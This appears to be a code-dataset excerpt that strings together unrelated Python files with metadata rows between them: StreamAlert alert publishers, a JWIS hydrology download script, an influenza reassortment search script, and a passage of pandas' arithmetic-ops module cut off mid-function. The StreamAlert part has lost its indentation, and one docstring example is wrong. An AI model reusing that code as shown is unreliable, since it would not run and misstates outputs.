if isinstance(next_item, dict):
# work on a copy of the keys to avoid modifying the dict while iterating over it
for key in list(next_item.keys()):
if re.search(regexp, key):
next_item.pop(key, None)
for key, item in next_item.items():
fringe.append(item)
elif isinstance(next_item, list):
fringe.extend(next_item)
else:
# It's a leaf node, or it's some strange object that doesn't belong here
pass
return publication
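# A minimal sketch of the deletion behavior (field names are made up):
def _demo_delete_dictionary_fields():
    pub = {'keep': 1, 'secret_token': 'x', 'nested': {'secret_key': 'y', 'ok': 2}}
    result = _delete_dictionary_fields(pub, r'^secret')
    # Matching keys are removed at every nesting level, in place
    assert result == {'keep': 1, 'nested': {'ok': 2}}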
@Register
def remove_fields(alert, publication):
"""This publisher deletes fields from the current publication.
The publisher uses the alert's context to determine which fields to delete. Example:
context={
'remove_fields': ['^field1$', '^field2$', ...]
}
"remove_fields" should be an array of strings that are valid regular expressions.
The algorithm deeply searches the publication for any dict key that matches the given regular
expression. Any such key is removed, and if the value is a nested dict, the entire dict
branch underneath is removed.
"""
fields = alert.context.get('remove_fields', [])
for field in fields:
publication = _delete_dictionary_fields(publication, field)
return publication
@Register
def remove_streamalert_normalization(_, publication):
"""This publisher removes the super heavyweight 'streamalert_normalization' fields"""
return _delete_dictionary_fields(publication, Normalizer.NORMALIZATION_KEY)
@Register
def enumerate_fields(_, publication):
"""Flattens all currently published fields.
By default, publications are deeply nested dict structures. This can be very hard to read
when rendered in certain outputs. PagerDuty is one example where the default UI does a very
poor job rendering nested dicts.
This publisher collapses deeply nested fields into a single-leveled dict with keys that
correspond to the original path of each value in a deeply nested dict. For example:
{
"top1": {
"mid1": "low",
"mid2": [ "low1", "low2", "low3" ],
"mid3": {
"low1": "verylow"
}
},
"top2": "mid"
}
.. would collapse into the following structure:
{
"top1.mid1": "low",
"top1.mid2[0]": "low1",
"top1.mid2[1]": "low1",
"top1.mid2[2]": "low1",
"top1.mid3.low1: "verylow",
"top2": "mid"
}
The output dict is an OrderedDict with keys sorted in alphabetical order.
"""
def _recursive_enumerate_fields(structure, output_reference, path=''):
if isinstance(structure, list):
for index, item in enumerate(structure):
_recursive_enumerate_fields(item, output_reference, '{}[{}]'.format(path, index))
elif isinstance(structure, dict):
for key in structure:
_recursive_enumerate_fields(structure[key], output_reference, '{prefix}{key}'.format(
prefix='{}.'.format(path) if path else '', # Omit first period
key=key
))
else:
output_reference[path] = structure
output = {}
_recursive_enumerate_fields(publication, output)
return OrderedDict(sorted(output.items()))
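# A minimal sketch mirroring the docstring example (assumes @Register returns
# the wrapped function unchanged, as its usage throughout this module implies):
def _demo_enumerate_fields():
    pub = {'top1': {'mid1': 'low', 'mid2': ['low1', 'low2']}, 'top2': 'mid'}
    flat = enumerate_fields(None, pub)
    assert list(flat.items()) == [
        ('top1.mid1', 'low'),
        ('top1.mid2[0]', 'low1'),
        ('top1.mid2[1]', 'low2'),
        ('top2', 'mid'),
    ]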
@Register
def populate_fields(alert, publication):
"""This publisher moves all requested fields to the top level and ignores everything else.
It uses the context to determine which fields to keep. Example:
context={
'populate_fields': [ 'field1', 'field2', 'field3' ]
}
"populate_fields" should be an array of strings that are exact matches to the field names.
The algorithm deeply searches the publication for any dict key that exactly matches one of the
given fields. It then takes the contents of that field and moves them up to the top level.
It discovers ALL values matching each field, so if a field is returned multiple times, the
resulting top level field will be an array. In the special case where exactly one entry is
returned for a populate_field, the value will instead be equal to that value (instead of an
array with 1 element being that value). In the special case when no entries are returned for
    a populate_field, the value will be None.
Aside from the moved fields, this publisher throws away everything else in the original
publication.
NOTE: It is possible for moved fields to continue to contain nested dicts, so do not assume
this publisher will result in a flat dictionary publication.
"""
new_publication = {}
for populate_field in alert.context.get('populate_fields', []):
extractions = get_keys(publication, populate_field)
new_publication[populate_field] = extractions
return new_publication
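# A minimal usage sketch (the alert is faked because only alert.context is
# read here; extraction semantics follow streamalert.shared.utils.get_keys):
#
#   from types import SimpleNamespace
#   alert = SimpleNamespace(context={'populate_fields': ['id']})
#   publication = {'detail': {'id': 42}, 'noise': True}
#   populate_fields(alert, publication)  # -> {'id': <values found for 'id'>}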
@Register
class StringifyArrays(AlertPublisher):
"""Deeply navigates a dict publication and coverts all scalar arrays to strings
Any array discovered with only scalar values will be joined into a single string with the
given DELIMITER. Subclass implementations of this can override the delimiter to join the
string differently.
"""
DELIMITER = '\n'
def publish(self, alert, publication):
fringe = deque()
fringe.append(publication)
while len(fringe) > 0:
next_item = fringe.popleft()
if isinstance(next_item, dict):
# Check all keys
for key, item in next_item.items():
if self.is_scalar_array(item):
next_item[key] = self.stringify(item)
else:
fringe.append(item)
elif isinstance(next_item, list):
# At this point, if the item is a list we assert that it is not a SCALAR array;
# because it is too late to stringify it, since we do not have a back reference
# to the object that contains it
fringe.extend(next_item)
else:
# It's a leaf node, or it's some strange object that doesn't belong here
pass
return publication
@staticmethod
def is_scalar_array(item):
"""Returns if the given item is a python list containing only scalar elements
NOTE: This method assumes that the 'item' provided comes from a valid JSON compliant dict.
It does not account for strange or complicated types, such as references to functions
or class definitions or other stuff.
Args:
item (mixed): The python variable to check
Returns:
bool
"""
if not isinstance(item, list):
return False
for element in item:
if isinstance(element, dict) or isinstance(element, list):
return False
return True
@classmethod
def stringify(cls, array):
"""Given a list of elements, will join them together with the publisher's DELIMITER
Args:
array (list): The array of elements.
Returns:
str
"""
return cls.DELIMITER.join([str(elem) for elem in array])
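# A minimal sketch of the two helpers above (assumes @Register returns the
# class unchanged):
def _demo_stringify_arrays():
    assert StringifyArrays.is_scalar_array(['a', 1, 2.5])
    assert not StringifyArrays.is_scalar_array([{'nested': True}])
    assert StringifyArrays.stringify(['a', 1]) == 'a\n1'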
|
apache-2.0
| 7,216,611,972,438,715,000
| 33.230769
| 101
| 0.656929
| false
| 4.479866
| false
| false
| false
|
i-kiwamu/jwis
|
jwis/__init__.py
|
1
|
1554
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from datetime import date, timedelta
import sys
import pandas as pd
import codecs
from .jwislib import JWIS
sys_encoding = sys.stdout.encoding
try:
input = raw_input
except NameError:
pass
def ask_date():
print("Beginning date")
d_start_year = int(input(" year? "))
d_start_month = int(input(" month? "))
d_start_date = int(input(" date? "))
d_start = date(d_start_year, d_start_month, d_start_date)
print("Final date")
d_end_year = int(input(" year? "))
d_end_month = int(input(" month? "))
d_end_date = int(input(" date? "))
d_end = date(d_end_year, d_end_month, d_end_date)
return (d_start, d_end)
def ask_obs_type():
print("Choose type of observation")
print(" 1: flow rate & height")
print(" 2: dam")
obs_type = input(" Selection: ")
return int(obs_type)
def ask_observatory():
obs_id = input("Input observatory ID: ")
return obs_id
def main():
date_periods = ask_date()
d_start = date_periods[0]
d_end = date_periods[1]
if d_start > d_end:
d_start, d_end = d_end, d_start
obs_type = ask_obs_type()
obs_id = ask_observatory()
output_filename = input("saving file name? ")
jwis = JWIS(obs_type, obs_id, d_start, d_end, "NO")
    if obs_type == 1:  # flow rate & height
        jwis_table = jwis.retrieve_hq_data()
    elif obs_type == 2:  # dam
        jwis_table = jwis.retrieve_data('1')
    else:
        sys.exit("Unknown observation type: {0}".format(obs_type))
    jwis_table.to_csv(output_filename)
print("Done")
|
gpl-3.0
| -16,430,081,994,334,884
| 22.907692
| 61
| 0.593951
| false
| 2.915572
| false
| false
| false
|
ericmjl/influenza-reassortment-detector
|
second_search.py
|
1
|
1571
|
import networkx as nx
import numpy as np
import pickle as pkl
import sys
class SecondSearchIdentifier(object):
"""
SecondSearchIdentifier
Identifies isolates for which a source pair search will be performed.
"""
def __init__(self, handle, percentile):
super(SecondSearchIdentifier, self).__init__()
self.handle = handle
self.percentile = percentile
self.G = None
self.pwi_distribution = []
self.cutoff_pwi = None
self.source_pair_nodes = []
def run(self):
self.G = nx.read_gpickle('{0} Full Complement Graph.pkl'.format(self.handle))
self.identify_sourceless_isolates()
self.get_pwi_distribution()
self.compute_cutoff_pwi()
self.identify_lowpwi_isolates()
self.write_second_search_list()
def identify_sourceless_isolates(self):
for n, d in self.G.nodes(data=True):
if len(self.G.in_edges(n)) == 0:
self.source_pair_nodes.append(n)
def get_pwi_distribution(self):
for n1, n2, d in self.G.edges(data=True):
self.pwi_distribution.append(d['pwi'])
def compute_cutoff_pwi(self):
self.cutoff_pwi = np.percentile(self.pwi_distribution, self.percentile)
def identify_lowpwi_isolates(self):
for n1, n2, d in self.G.edges(data=True):
if d['pwi'] < self.cutoff_pwi:
self.source_pair_nodes.append(n2)
def write_second_search_list(self):
with open('{0} Isolates for Source Pair Search.pkllist'.format(self.handle), 'wb') as f:
pkl.dump(self.source_pair_nodes, f)
if __name__ == '__main__':
handle = sys.argv[1]
percentile = int(sys.argv[2])
ssi = SecondSearchIdentifier(handle, percentile)
ssi.run()
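# For reference, the percentile cutoff used above behaves like this minimal
# sketch (values are made up):
#
#   >>> np.percentile([0.1, 0.2, 0.3, 0.4], 25)
#   0.175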
|
mit
| -8,981,593,487,873,865,000
| 27.071429
| 90
| 0.705283
| false
| 2.82554
| false
| false
| false
|
kushalbhola/MyStuff
|
Practice/PythonApplication/env/Lib/site-packages/pandas/core/ops/__init__.py
|
1
|
55485
|
"""
Arithmetic operations for PandasObjects
This is not a public API.
"""
import datetime
import operator
import textwrap
from typing import Any, Callable
import warnings
import numpy as np
from pandas._libs import Timedelta, Timestamp, lib, ops as libops
from pandas.errors import NullFrequencyError
from pandas.util._decorators import Appender
from pandas.core.dtypes.cast import (
construct_1d_object_array_from_listlike,
find_common_type,
maybe_upcast_putmask,
)
from pandas.core.dtypes.common import (
ensure_object,
is_bool_dtype,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_datetimelike_v_numeric,
is_extension_array_dtype,
is_integer_dtype,
is_list_like,
is_object_dtype,
is_period_dtype,
is_scalar,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.generic import (
ABCDataFrame,
ABCDatetimeArray,
ABCIndex,
ABCIndexClass,
ABCSeries,
ABCSparseArray,
ABCSparseSeries,
ABCTimedeltaArray,
)
from pandas.core.dtypes.missing import isna, notna
import pandas as pd
from pandas._typing import ArrayLike
import pandas.core.common as com
from . import missing
from .docstrings import (
_arith_doc_FRAME,
_flex_comp_doc_FRAME,
_make_flex_doc,
_op_descriptions,
)
from .roperator import ( # noqa:F401
radd,
rand_,
rdiv,
rdivmod,
rfloordiv,
rmod,
rmul,
ror_,
rpow,
rsub,
rtruediv,
rxor,
)
# -----------------------------------------------------------------------------
# Ops Wrapping Utilities
def get_op_result_name(left, right):
"""
Find the appropriate name to pin to an operation result. This result
should always be either an Index or a Series.
Parameters
----------
left : {Series, Index}
right : object
Returns
-------
name : object
Usually a string
"""
# `left` is always a pd.Series when called from within ops
if isinstance(right, (ABCSeries, ABCIndexClass)):
name = _maybe_match_name(left, right)
else:
name = left.name
return name
def _maybe_match_name(a, b):
"""
Try to find a name to attach to the result of an operation between
a and b. If only one of these has a `name` attribute, return that
name. Otherwise return a consensus name if they match of None if
they have different names.
Parameters
----------
a : object
b : object
Returns
-------
name : str or None
See Also
--------
pandas.core.common.consensus_name_attr
"""
a_has = hasattr(a, "name")
b_has = hasattr(b, "name")
if a_has and b_has:
if a.name == b.name:
return a.name
else:
# TODO: what if they both have np.nan for their names?
return None
elif a_has:
return a.name
elif b_has:
return b.name
return None
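# A minimal sketch of the name-resolution rules (plain objects suffice, since
# only the `name` attribute is inspected):
def _demo_maybe_match_name():
    class _Named:
        def __init__(self, name):
            self.name = name

    assert _maybe_match_name(_Named("x"), _Named("x")) == "x"
    assert _maybe_match_name(_Named("x"), _Named("y")) is None
    assert _maybe_match_name(_Named("x"), object()) == "x"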
def maybe_upcast_for_op(obj):
"""
Cast non-pandas objects to pandas types to unify behavior of arithmetic
and comparison operations.
Parameters
----------
obj: object
Returns
-------
out : object
Notes
-----
Be careful to call this *after* determining the `name` attribute to be
attached to the result of the arithmetic operation.
"""
if type(obj) is datetime.timedelta:
# GH#22390 cast up to Timedelta to rely on Timedelta
# implementation; otherwise operation against numeric-dtype
# raises TypeError
return Timedelta(obj)
elif isinstance(obj, np.timedelta64) and not isna(obj):
# In particular non-nanosecond timedelta64 needs to be cast to
# nanoseconds, or else we get undesired behavior like
# np.timedelta64(3, 'D') / 2 == np.timedelta64(1, 'D')
# The isna check is to avoid casting timedelta64("NaT"), which would
# return NaT and incorrectly be treated as a datetime-NaT.
return Timedelta(obj)
elif isinstance(obj, np.ndarray) and is_timedelta64_dtype(obj):
# GH#22390 Unfortunately we need to special-case right-hand
# timedelta64 dtypes because numpy casts integer dtypes to
# timedelta64 when operating with timedelta64
return pd.TimedeltaIndex(obj)
return obj
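# A minimal sketch of the upcasting rules above:
def _demo_maybe_upcast_for_op():
    # Plain timedeltas and non-nanosecond timedelta64 scalars become Timedelta
    assert isinstance(maybe_upcast_for_op(datetime.timedelta(days=3)), Timedelta)
    assert isinstance(maybe_upcast_for_op(np.timedelta64(3, "D")), Timedelta)
    # Anything else passes through unchanged
    assert maybe_upcast_for_op(5) == 5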
# -----------------------------------------------------------------------------
def make_invalid_op(name):
"""
Return a binary method that always raises a TypeError.
Parameters
----------
name : str
Returns
-------
invalid_op : function
"""
def invalid_op(self, other=None):
raise TypeError(
"cannot perform {name} with this index type: "
"{typ}".format(name=name, typ=type(self).__name__)
)
invalid_op.__name__ = name
return invalid_op
def _gen_eval_kwargs(name):
"""
Find the keyword arguments to pass to numexpr for the given operation.
Parameters
----------
name : str
Returns
-------
eval_kwargs : dict
Examples
--------
>>> _gen_eval_kwargs("__add__")
{}
>>> _gen_eval_kwargs("rtruediv")
{'reversed': True, 'truediv': True}
"""
kwargs = {}
# Series appear to only pass __add__, __radd__, ...
# but DataFrame gets both these dunder names _and_ non-dunder names
# add, radd, ...
name = name.replace("__", "")
if name.startswith("r"):
if name not in ["radd", "rand", "ror", "rxor"]:
# Exclude commutative operations
kwargs["reversed"] = True
if name in ["truediv", "rtruediv"]:
kwargs["truediv"] = True
if name in ["ne"]:
kwargs["masker"] = True
return kwargs
def _get_frame_op_default_axis(name):
"""
Only DataFrame cares about default_axis, specifically:
special methods have default_axis=None and flex methods
have default_axis='columns'.
Parameters
----------
name : str
Returns
-------
default_axis: str or None
"""
if name.replace("__r", "__") in ["__and__", "__or__", "__xor__"]:
# bool methods
return "columns"
elif name.startswith("__"):
# __add__, __mul__, ...
return None
else:
# add, mul, ...
return "columns"
def _get_opstr(op, cls):
"""
Find the operation string, if any, to pass to numexpr for this
operation.
Parameters
----------
op : binary operator
cls : class
Returns
-------
op_str : string or None
"""
# numexpr is available for non-sparse classes
subtyp = getattr(cls, "_subtyp", "")
use_numexpr = "sparse" not in subtyp
if not use_numexpr:
# if we're not using numexpr, then don't pass a str_rep
return None
return {
operator.add: "+",
radd: "+",
operator.mul: "*",
rmul: "*",
operator.sub: "-",
rsub: "-",
operator.truediv: "/",
rtruediv: "/",
operator.floordiv: "//",
rfloordiv: "//",
operator.mod: None, # TODO: Why None for mod but '%' for rmod?
rmod: "%",
operator.pow: "**",
rpow: "**",
operator.eq: "==",
operator.ne: "!=",
operator.le: "<=",
operator.lt: "<",
operator.ge: ">=",
operator.gt: ">",
operator.and_: "&",
rand_: "&",
operator.or_: "|",
ror_: "|",
operator.xor: "^",
rxor: "^",
divmod: None,
rdivmod: None,
}[op]
def _get_op_name(op, special):
"""
Find the name to attach to this method according to conventions
for special and non-special methods.
Parameters
----------
op : binary operator
special : bool
Returns
-------
op_name : str
"""
opname = op.__name__.strip("_")
if special:
opname = "__{opname}__".format(opname=opname)
return opname
# -----------------------------------------------------------------------------
# Masking NA values and fallbacks for operations numpy does not support
def fill_binop(left, right, fill_value):
"""
If a non-None fill_value is given, replace null entries in left and right
with this value, but only in positions where _one_ of left/right is null,
not both.
Parameters
----------
left : array-like
right : array-like
fill_value : object
Returns
-------
left : array-like
right : array-like
Notes
-----
Makes copies if fill_value is not None
"""
# TODO: can we make a no-copy implementation?
if fill_value is not None:
left_mask = isna(left)
right_mask = isna(right)
left = left.copy()
right = right.copy()
# one but not both
mask = left_mask ^ right_mask
left[left_mask & mask] = fill_value
right[right_mask & mask] = fill_value
return left, right
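# A minimal sketch: positions where exactly one side is null receive the
# fill_value; positions where both sides are null stay null.
def _demo_fill_binop():
    left = pd.Series([1.0, np.nan, np.nan])
    right = pd.Series([np.nan, 2.0, np.nan])
    new_left, new_right = fill_binop(left, right, fill_value=0)
    assert new_left.tolist()[:2] == [1.0, 0.0]
    assert new_right.tolist()[:2] == [0.0, 2.0]
    assert np.isnan(new_left[2]) and np.isnan(new_right[2])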
def mask_cmp_op(x, y, op):
"""
Apply the function `op` to only non-null points in x and y.
Parameters
----------
x : array-like
y : array-like
op : binary operation
Returns
-------
result : ndarray[bool]
"""
xrav = x.ravel()
result = np.empty(x.size, dtype=bool)
if isinstance(y, (np.ndarray, ABCSeries)):
yrav = y.ravel()
mask = notna(xrav) & notna(yrav)
result[mask] = op(np.array(list(xrav[mask])), np.array(list(yrav[mask])))
else:
mask = notna(xrav)
result[mask] = op(np.array(list(xrav[mask])), y)
if op == operator.ne: # pragma: no cover
np.putmask(result, ~mask, True)
else:
np.putmask(result, ~mask, False)
result = result.reshape(x.shape)
return result
def masked_arith_op(x, y, op):
"""
If the given arithmetic operation fails, attempt it again on
only the non-null elements of the input array(s).
Parameters
----------
x : np.ndarray
y : np.ndarray, Series, Index
op : binary operator
"""
# For Series `x` is 1D so ravel() is a no-op; calling it anyway makes
# the logic valid for both Series and DataFrame ops.
xrav = x.ravel()
assert isinstance(x, (np.ndarray, ABCSeries)), type(x)
if isinstance(y, (np.ndarray, ABCSeries, ABCIndexClass)):
dtype = find_common_type([x.dtype, y.dtype])
result = np.empty(x.size, dtype=dtype)
# PeriodIndex.ravel() returns int64 dtype, so we have
# to work around that case. See GH#19956
yrav = y if is_period_dtype(y) else y.ravel()
mask = notna(xrav) & notna(yrav)
if yrav.shape != mask.shape:
# FIXME: GH#5284, GH#5035, GH#19448
# Without specifically raising here we get mismatched
# errors in Py3 (TypeError) vs Py2 (ValueError)
            # Note: this is only an issue in the DataFrame case
raise ValueError("Cannot broadcast operands together.")
if mask.any():
with np.errstate(all="ignore"):
result[mask] = op(xrav[mask], com.values_from_object(yrav[mask]))
else:
assert is_scalar(y), type(y)
assert isinstance(x, np.ndarray), type(x)
# mask is only meaningful for x
result = np.empty(x.size, dtype=x.dtype)
mask = notna(xrav)
# 1 ** np.nan is 1. So we have to unmask those.
if op == pow:
mask = np.where(x == 1, False, mask)
elif op == rpow:
mask = np.where(y == 1, False, mask)
if mask.any():
with np.errstate(all="ignore"):
result[mask] = op(xrav[mask], y)
result, changed = maybe_upcast_putmask(result, ~mask, np.nan)
result = result.reshape(x.shape) # 2D compat
return result
def invalid_comparison(left, right, op):
"""
If a comparison has mismatched types and is not necessarily meaningful,
follow python3 conventions by:
- returning all-False for equality
- returning all-True for inequality
- raising TypeError otherwise
Parameters
----------
left : array-like
right : scalar, array-like
op : operator.{eq, ne, lt, le, gt}
Raises
------
TypeError : on inequality comparisons
"""
if op is operator.eq:
res_values = np.zeros(left.shape, dtype=bool)
elif op is operator.ne:
res_values = np.ones(left.shape, dtype=bool)
else:
raise TypeError(
"Invalid comparison between dtype={dtype} and {typ}".format(
dtype=left.dtype, typ=type(right).__name__
)
)
return res_values
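# A minimal sketch of the python3-style conventions above:
def _demo_invalid_comparison():
    arr = np.arange(3)
    assert not invalid_comparison(arr, "foo", operator.eq).any()
    assert invalid_comparison(arr, "foo", operator.ne).all()
    try:
        invalid_comparison(arr, "foo", operator.lt)
    except TypeError:
        pass  # ordered comparisons between mismatched types raise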
# -----------------------------------------------------------------------------
# Dispatch logic
def should_series_dispatch(left, right, op):
"""
Identify cases where a DataFrame operation should dispatch to its
Series counterpart.
Parameters
----------
left : DataFrame
right : DataFrame
op : binary operator
Returns
-------
override : bool
"""
if left._is_mixed_type or right._is_mixed_type:
return True
if not len(left.columns) or not len(right.columns):
# ensure obj.dtypes[0] exists for each obj
return False
ldtype = left.dtypes.iloc[0]
rdtype = right.dtypes.iloc[0]
if (is_timedelta64_dtype(ldtype) and is_integer_dtype(rdtype)) or (
is_timedelta64_dtype(rdtype) and is_integer_dtype(ldtype)
):
        # numpy casts integer dtypes to timedelta64 in this scenario
return True
if is_datetime64_dtype(ldtype) and is_object_dtype(rdtype):
# in particular case where right is an array of DateOffsets
return True
return False
def dispatch_to_series(left, right, func, str_rep=None, axis=None):
"""
Evaluate the frame operation func(left, right) by evaluating
column-by-column, dispatching to the Series implementation.
Parameters
----------
left : DataFrame
right : scalar or DataFrame
func : arithmetic or comparison operator
str_rep : str or None, default None
axis : {None, 0, 1, "index", "columns"}
Returns
-------
DataFrame
"""
# Note: we use iloc to access columns for compat with cases
# with non-unique columns.
import pandas.core.computation.expressions as expressions
right = lib.item_from_zerodim(right)
if lib.is_scalar(right) or np.ndim(right) == 0:
def column_op(a, b):
return {i: func(a.iloc[:, i], b) for i in range(len(a.columns))}
elif isinstance(right, ABCDataFrame):
assert right._indexed_same(left)
def column_op(a, b):
return {i: func(a.iloc[:, i], b.iloc[:, i]) for i in range(len(a.columns))}
elif isinstance(right, ABCSeries) and axis == "columns":
# We only get here if called via left._combine_match_columns,
# in which case we specifically want to operate row-by-row
assert right.index.equals(left.columns)
def column_op(a, b):
return {i: func(a.iloc[:, i], b.iloc[i]) for i in range(len(a.columns))}
elif isinstance(right, ABCSeries):
assert right.index.equals(left.index) # Handle other cases later
def column_op(a, b):
return {i: func(a.iloc[:, i], b) for i in range(len(a.columns))}
else:
# Remaining cases have less-obvious dispatch rules
raise NotImplementedError(right)
new_data = expressions.evaluate(column_op, str_rep, left, right)
result = left._constructor(new_data, index=left.index, copy=False)
# Pin columns instead of passing to constructor for compat with
# non-unique columns case
result.columns = left.columns
return result
def dispatch_to_index_op(op, left, right, index_class):
"""
Wrap Series left in the given index_class to delegate the operation op
to the index implementation. DatetimeIndex and TimedeltaIndex perform
type checking, timezone handling, overflow checks, etc.
Parameters
----------
op : binary operator (operator.add, operator.sub, ...)
left : Series
right : object
index_class : DatetimeIndex or TimedeltaIndex
Returns
-------
result : object, usually DatetimeIndex, TimedeltaIndex, or Series
"""
left_idx = index_class(left)
# avoid accidentally allowing integer add/sub. For datetime64[tz] dtypes,
# left_idx may inherit a freq from a cached DatetimeIndex.
# See discussion in GH#19147.
if getattr(left_idx, "freq", None) is not None:
left_idx = left_idx._shallow_copy(freq=None)
try:
result = op(left_idx, right)
except NullFrequencyError:
# DatetimeIndex and TimedeltaIndex with freq == None raise ValueError
# on add/sub of integers (or int-like). We re-raise as a TypeError.
raise TypeError(
"incompatible type for a datetime/timedelta "
"operation [{name}]".format(name=op.__name__)
)
return result
def dispatch_to_extension_op(op, left, right):
"""
Assume that left or right is a Series backed by an ExtensionArray,
apply the operator defined by op.
"""
# The op calls will raise TypeError if the op is not defined
# on the ExtensionArray
# unbox Series and Index to arrays
if isinstance(left, (ABCSeries, ABCIndexClass)):
new_left = left._values
else:
new_left = left
if isinstance(right, (ABCSeries, ABCIndexClass)):
new_right = right._values
else:
new_right = right
res_values = op(new_left, new_right)
res_name = get_op_result_name(left, right)
if op.__name__ in ["divmod", "rdivmod"]:
return _construct_divmod_result(left, res_values, left.index, res_name)
return _construct_result(left, res_values, left.index, res_name)
# -----------------------------------------------------------------------------
# Functions that add arithmetic methods to objects, given arithmetic factory
# methods
def _get_method_wrappers(cls):
"""
Find the appropriate operation-wrappers to use when defining flex/special
arithmetic, boolean, and comparison operations with the given class.
Parameters
----------
cls : class
Returns
-------
arith_flex : function or None
comp_flex : function or None
arith_special : function
comp_special : function
bool_special : function
Notes
-----
None is only returned for SparseArray
"""
if issubclass(cls, ABCSparseSeries):
# Be sure to catch this before ABCSeries and ABCSparseArray,
# as they will both come see SparseSeries as a subclass
arith_flex = _flex_method_SERIES
comp_flex = _flex_method_SERIES
arith_special = _arith_method_SPARSE_SERIES
comp_special = _arith_method_SPARSE_SERIES
bool_special = _bool_method_SERIES
# TODO: I don't think the functions defined by bool_method are tested
elif issubclass(cls, ABCSeries):
# Just Series; SparseSeries is caught above
arith_flex = _flex_method_SERIES
comp_flex = _flex_method_SERIES
arith_special = _arith_method_SERIES
comp_special = _comp_method_SERIES
bool_special = _bool_method_SERIES
elif issubclass(cls, ABCDataFrame):
# Same for DataFrame and SparseDataFrame
arith_flex = _arith_method_FRAME
comp_flex = _flex_comp_method_FRAME
arith_special = _arith_method_FRAME
comp_special = _comp_method_FRAME
bool_special = _arith_method_FRAME
return arith_flex, comp_flex, arith_special, comp_special, bool_special
def _create_methods(cls, arith_method, comp_method, bool_method, special):
# creates actual methods based upon arithmetic, comp and bool method
# constructors.
have_divmod = issubclass(cls, ABCSeries)
# divmod is available for Series and SparseSeries
# yapf: disable
new_methods = dict(
add=arith_method(cls, operator.add, special),
radd=arith_method(cls, radd, special),
sub=arith_method(cls, operator.sub, special),
mul=arith_method(cls, operator.mul, special),
truediv=arith_method(cls, operator.truediv, special),
floordiv=arith_method(cls, operator.floordiv, special),
# Causes a floating point exception in the tests when numexpr enabled,
# so for now no speedup
mod=arith_method(cls, operator.mod, special),
pow=arith_method(cls, operator.pow, special),
# not entirely sure why this is necessary, but previously was included
# so it's here to maintain compatibility
rmul=arith_method(cls, rmul, special),
rsub=arith_method(cls, rsub, special),
rtruediv=arith_method(cls, rtruediv, special),
rfloordiv=arith_method(cls, rfloordiv, special),
rpow=arith_method(cls, rpow, special),
rmod=arith_method(cls, rmod, special))
# yapf: enable
new_methods["div"] = new_methods["truediv"]
new_methods["rdiv"] = new_methods["rtruediv"]
if have_divmod:
# divmod doesn't have an op that is supported by numexpr
new_methods["divmod"] = arith_method(cls, divmod, special)
new_methods["rdivmod"] = arith_method(cls, rdivmod, special)
new_methods.update(
dict(
eq=comp_method(cls, operator.eq, special),
ne=comp_method(cls, operator.ne, special),
lt=comp_method(cls, operator.lt, special),
gt=comp_method(cls, operator.gt, special),
le=comp_method(cls, operator.le, special),
ge=comp_method(cls, operator.ge, special),
)
)
if bool_method:
new_methods.update(
dict(
and_=bool_method(cls, operator.and_, special),
or_=bool_method(cls, operator.or_, special),
# For some reason ``^`` wasn't used in original.
xor=bool_method(cls, operator.xor, special),
rand_=bool_method(cls, rand_, special),
ror_=bool_method(cls, ror_, special),
rxor=bool_method(cls, rxor, special),
)
)
if special:
dunderize = lambda x: "__{name}__".format(name=x.strip("_"))
else:
dunderize = lambda x: x
new_methods = {dunderize(k): v for k, v in new_methods.items()}
return new_methods
def add_methods(cls, new_methods):
for name, method in new_methods.items():
# For most methods, if we find that the class already has a method
# of the same name, it is OK to over-write it. The exception is
# inplace methods (__iadd__, __isub__, ...) for SparseArray, which
# retain the np.ndarray versions.
force = not (issubclass(cls, ABCSparseArray) and name.startswith("__i"))
if force or name not in cls.__dict__:
setattr(cls, name, method)
# ----------------------------------------------------------------------
# Arithmetic
def add_special_arithmetic_methods(cls):
"""
Adds the full suite of special arithmetic methods (``__add__``,
``__sub__``, etc.) to the class.
Parameters
----------
cls : class
special methods will be defined and pinned to this class
"""
_, _, arith_method, comp_method, bool_method = _get_method_wrappers(cls)
new_methods = _create_methods(
cls, arith_method, comp_method, bool_method, special=True
)
# inplace operators (I feel like these should get passed an `inplace=True`
    # or just be removed)
def _wrap_inplace_method(method):
"""
return an inplace wrapper for this method
"""
def f(self, other):
result = method(self, other)
# this makes sure that we are aligned like the input
# we are updating inplace so we want to ignore is_copy
self._update_inplace(
result.reindex_like(self, copy=False)._data, verify_is_copy=False
)
return self
f.__name__ = "__i{name}__".format(name=method.__name__.strip("__"))
return f
new_methods.update(
dict(
__iadd__=_wrap_inplace_method(new_methods["__add__"]),
__isub__=_wrap_inplace_method(new_methods["__sub__"]),
__imul__=_wrap_inplace_method(new_methods["__mul__"]),
__itruediv__=_wrap_inplace_method(new_methods["__truediv__"]),
__ifloordiv__=_wrap_inplace_method(new_methods["__floordiv__"]),
__imod__=_wrap_inplace_method(new_methods["__mod__"]),
__ipow__=_wrap_inplace_method(new_methods["__pow__"]),
)
)
new_methods.update(
dict(
__iand__=_wrap_inplace_method(new_methods["__and__"]),
__ior__=_wrap_inplace_method(new_methods["__or__"]),
__ixor__=_wrap_inplace_method(new_methods["__xor__"]),
)
)
add_methods(cls, new_methods=new_methods)
def add_flex_arithmetic_methods(cls):
"""
Adds the full suite of flex arithmetic methods (``pow``, ``mul``, ``add``)
to the class.
Parameters
----------
cls : class
flex methods will be defined and pinned to this class
"""
flex_arith_method, flex_comp_method, _, _, _ = _get_method_wrappers(cls)
new_methods = _create_methods(
cls, flex_arith_method, flex_comp_method, bool_method=None, special=False
)
new_methods.update(
dict(
multiply=new_methods["mul"],
subtract=new_methods["sub"],
divide=new_methods["div"],
)
)
# opt out of bool flex methods for now
assert not any(kname in new_methods for kname in ("ror_", "rxor", "rand_"))
add_methods(cls, new_methods=new_methods)
# -----------------------------------------------------------------------------
# Series
def _align_method_SERIES(left, right, align_asobject=False):
""" align lhs and rhs Series """
    # TODO: unlike _align_method_FRAME, list, tuple and ndarray are not
    # coerced here, because Series has inconsistencies described in GH#13637
if isinstance(right, ABCSeries):
# avoid repeated alignment
if not left.index.equals(right.index):
if align_asobject:
# to keep original value's dtype for bool ops
left = left.astype(object)
right = right.astype(object)
left, right = left.align(right, copy=False)
return left, right
def _construct_result(left, result, index, name, dtype=None):
"""
If the raw op result has a non-None name (e.g. it is an Index object) and
the name argument is None, then passing name to the constructor will
not be enough; we still need to override the name attribute.
"""
out = left._constructor(result, index=index, dtype=dtype)
out = out.__finalize__(left)
out.name = name
return out
def _construct_divmod_result(left, result, index, name, dtype=None):
"""divmod returns a tuple of like indexed series instead of a single series.
"""
return (
